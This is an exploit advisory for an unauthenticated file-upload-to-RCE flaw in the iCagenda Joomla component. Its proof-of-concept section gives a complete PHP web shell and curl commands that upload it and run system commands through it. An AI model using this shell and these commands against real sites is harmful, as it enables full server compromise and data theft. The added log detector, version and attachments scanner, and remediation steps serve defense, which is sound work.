Source: https://sploitus.com/exploit?id=PACKETSTORM:224540
# CVE-2026-48939 - iCagenda Unauthenticated File Upload to RCE
## Overview
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-48939 |
| **CVSS 4.0 Score** | 10.0 Critical |
| **CVSS Vector** | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| **CWE** | CWE-284: Improper Access Control |
| **Affected Versions** | iCagenda 3.2.1 - 3.9.14 and 4.0.0 - 4.0.7 |
| **Fixed In** | iCagenda 4.0.8 and 3.9.15 |
| **Published** | 20 June 2026 |
## Vulnerability Description
iCagenda, a popular events and calendar component for Joomla, contains an unauthenticated file upload vulnerability that allows remote attackers to upload and execute arbitrary PHP code on Joomla 6 sites.
### Technical Details
The vulnerability exists in the frontend event submission form's file attachment feature:
1. **Missing Access Control**: The submit endpoint (`index.php?option=com_icagenda&task=registration.submit`) does not enforce authentication, bypassing the "Registered Only" access setting.
2. **No File Validation**: Uploaded files are saved with their original extension without:
   - Extension allowlist validation
   - MIME type verification
   - File content inspection
3. **Direct File Write**: Files are written to `/images/icagenda/frontend/attachments/[filename]` directly under the web root.
4. **PHP Execution**: On Joomla 6, the uploaded `.php` files are executable, leading to Remote Code Execution (RCE).
## Proof of Concept
### Method 1: Using curl (Single Command)
```bash
# Create PHP shell payload
cat > /tmp/shell.php << 'EOF'
<?php
echo "CVE-2026-48939 - SHELL ACTIVE\n";
if(isset($_GET['cmd'])) {
echo shell_exec($_GET['cmd'] . " 2>&1");
}
?>
EOF
# Upload the shell
curl -k -s \
-F "title=Test Event" \
-F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
"https://poloss-jomola.ddev.site/icagenda_submit.php"
# Execute commands via uploaded shell
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"
```
### Method 2: Using PoC Script
```bash
# Navigate to project directory
# Run PoC script
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site
```
## Exploitation Steps
1. **Identify vulnerable endpoint**:
```
https://target.com/index.php?option=com_icagenda&task=submit
```
2. **Upload PHP web shell**:
```bash
curl -X POST -F "jform[attachment]=@shell.php" \
"https://target.com/index.php?option=com_icagenda&task=submit"
```
3. **Execute shell**:
```bash
curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
```
## Impact
- **Confidentiality**: Complete loss of confidentiality - attacker can read all files
- **Integrity**: Complete loss of integrity - attacker can modify all data
- **Availability**: Complete loss of availability - attacker can deny service
- **Remote Code Execution**: Full server compromise
## Attack Signature
Based on real-world exploitation logs, the attack signature is:
```
# Step 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"
# Step 2: Execute
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0
```
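The signature above is easy to turn into a log check: a POST to the `com_icagenda` submit task from an address that then requests a `.php` file under the attachments directory is the exploit chain, any `.php` request into that directory at all is suspicious on its own, and the `icagenda-batch/1.0` user-agent is a weaker indicator worth flagging. The following is an added example, not part of the advisory, that runs that logic over combined-format access log lines; the log lines in `SAMPLE_LOG` are constructed and the severities are an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log excerpt: one benign PDF download, one full exploit
# chain, one tool user-agent only, one ordinary registered submission.
SAMPLE_LOG = """\
198.51.100.2 - - [20/Jun/2026:09:58:11 +0000] "GET /images/icagenda/frontend/attachments/agenda_2026.pdf HTTP/1.1" 200 48213 "https://example.org/events" "Mozilla/5.0"
203.0.113.7 - - [20/Jun/2026:10:00:01 +0000] "POST /index.php?option=com_icagenda&task=submit HTTP/1.1" 303 0 "-" "icagenda-batch/1.0"
203.0.113.7 - - [20/Jun/2026:10:00:02 +0000] "GET /images/icagenda/frontend/attachments/shell_1782986401.php?cmd=id HTTP/1.1" 200 57 "-" "icagenda-batch/1.0"
192.0.2.9 - - [20/Jun/2026:10:05:40 +0000] "GET /index.php?option=com_icagenda&view=list HTTP/1.1" 200 9120 "-" "icagenda-batch/1.0"
198.51.100.2 - - [20/Jun/2026:10:06:15 +0000] "POST /index.php?option=com_icagenda&task=registration.submit HTTP/1.1" 303 0 "https://example.org/events" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SUBMIT_TASKS = {"submit", "registration.submit"}
ATTACH_PHP_RE = re.compile(
    r"^/images/icagenda/frontend/attachments/[^/]+\.(php\d?|phtml|phar)$", re.IGNORECASE
)
EXPLOIT_UA_PREFIX = "icagenda-batch/"
RANK = {"medium": 1, "high": 2, "critical": 3}


def is_submit_post(method: str, target: str) -> bool:
    """True for a POST to the iCagenda frontend submit task (either task name)."""
    if method != "POST":
        return False
    q = parse_qs(urlsplit(target).query)
    return q.get("option", [""])[0] == "com_icagenda" and q.get("task", [""])[0] in SUBMIT_TASKS


def analyze(log_text: str) -> dict:
    """Return {ip: {"severity": ..., "reasons": [...]}} for addresses worth a look."""
    uploads = defaultdict(list)  # ip -> line numbers of submit POSTs seen so far
    findings = defaultdict(lambda: {"severity": None, "reasons": []})

    def add(ip, severity, reason):
        entry = findings[ip]
        entry["reasons"].append(reason)
        if entry["severity"] is None or RANK[severity] > RANK[entry["severity"]]:
            entry["severity"] = severity

    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line; count these separately in production
        ip, method, target, ua = m["ip"], m["method"], m["target"], m["ua"]
        path = urlsplit(target).path
        if is_submit_post(method, target):
            uploads[ip].append(n)  # normal on its own, context for what follows
        if ATTACH_PHP_RE.match(path):
            add(ip, "high", f"line {n}: PHP file requested from attachments dir ({path})")
            if uploads[ip]:
                add(ip, "critical", f"line {n}: submit POST at line {uploads[ip][0]} followed by PHP execution")
        if ua.startswith(EXPLOIT_UA_PREFIX):
            add(ip, "medium", f"line {n}: exploit-tool user-agent {ua!r}")
    return dict(findings)


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, entry["severity"])
        for reason in entry["reasons"]:
            print("   ", reason)
```

A plain submit POST is not alerted on by itself, since registered users legitimately use that endpoint; the correlation is per source address and in log order, so a `.php` request that precedes any upload from the same address is still reported as high rather than critical.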
## Remediation
1. **Immediate**: Update iCagenda to version 4.0.8 (or 3.9.15 for legacy branch)
2. **Alternative**: Remove or rename `com_icagenda` folders temporarily
3. **Note**: Unpublishing the component does NOT protect against this vulnerability
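Because unpublishing the component does not help, the only reliable questions after reading this advisory are "is the installed version inside the affected ranges?" and "is there already a server-side script in the attachments directory?". The following is an added example, not part of the advisory or of iCagenda, that answers both: it compares a version string against the affected ranges listed in the overview, reads the version from the component's Joomla manifest, and scans the attachments directory for leftover `.php`-style files or a planted `.htaccess`. The manifest path `administrator/components/com_icagenda/icagenda.xml` is an assumption about the standard Joomla component layout; the site tree built in `run_demo()` is constructed.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Affected ranges from the advisory: 3.2.1 - 3.9.14 and 4.0.0 - 4.0.7.
AFFECTED_RANGES = [((3, 2, 1), (3, 9, 14)), ((4, 0, 0), (4, 0, 7))]
MANIFEST_REL_PATH = "administrator/components/com_icagenda/icagenda.xml"  # assumed location
ATTACHMENTS_REL_PATH = "images/icagenda/frontend/attachments"            # from the advisory
# Files that should never exist in an attachments directory.
SUSPICIOUS_RE = re.compile(r"(\.(php\d?|phtml|phar)|^\.htaccess)$", re.IGNORECASE)


def parse_version(text: str) -> tuple:
    """'4.0.7' -> (4, 0, 7); missing components are padded with 0."""
    nums = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def is_affected(version: str) -> bool:
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def manifest_version(xml_text: str):
    """Read <version> from a Joomla extension manifest; None if absent."""
    root = ET.fromstring(xml_text)
    el = root.find("version")
    return el.text.strip() if el is not None and el.text else None


def scan_attachments(directory: str) -> list:
    """Relative paths of suspicious files under the attachments directory."""
    hits = []
    for dirpath, _, files in os.walk(directory):
        for name in files:
            if SUSPICIOUS_RE.search(name):
                hits.append(os.path.relpath(os.path.join(dirpath, name), directory))
    return sorted(hits)


def site_check(site_root: str) -> dict:
    with open(os.path.join(site_root, MANIFEST_REL_PATH), encoding="utf-8") as fh:
        version = manifest_version(fh.read())
    return {
        "version": version,
        "affected": is_affected(version) if version else None,
        "suspicious_files": scan_attachments(os.path.join(site_root, ATTACHMENTS_REL_PATH)),
    }


def run_demo() -> dict:
    """Build a constructed site tree (vulnerable 4.0.7 plus one planted file) and check it."""
    root = tempfile.mkdtemp(prefix="joomla-")
    os.makedirs(os.path.join(root, os.path.dirname(MANIFEST_REL_PATH)))
    with open(os.path.join(root, MANIFEST_REL_PATH), "w", encoding="utf-8") as fh:
        fh.write('<?xml version="1.0"?><extension type="component" method="upgrade">'
                 '<name>com_icagenda</name><version>4.0.7</version></extension>')
    attachments = os.path.join(root, ATTACHMENTS_REL_PATH)
    os.makedirs(attachments)
    open(os.path.join(attachments, "agenda.pdf"), "wb").close()
    open(os.path.join(attachments, "shell_1782986401.php"), "wb").close()  # planted, empty
    return site_check(root)


if __name__ == "__main__":
    print(run_demo())
```

Run `site_check()` against the real site root after updating: `affected` must be `False` and `suspicious_files` empty. Any hit in the attachments directory means the host was already reached and belongs in incident response, not just in the patch queue.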
## References
- [iCagenda Zero Day RCE - mysites.guru](https://mysites.guru/blog/icagenda-zero-day-file-upload-rce/)
- [iCagenda Official](https://www.icagenda.com/)
- [Changelog 4.0.8](https://www.icagenda.com/docs/changelog/icagenda-4-0-8)
- [CISA ADP Advisory](https://www.cisa.gov/news-events/alerts)
## Disclaimer
This PoC is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.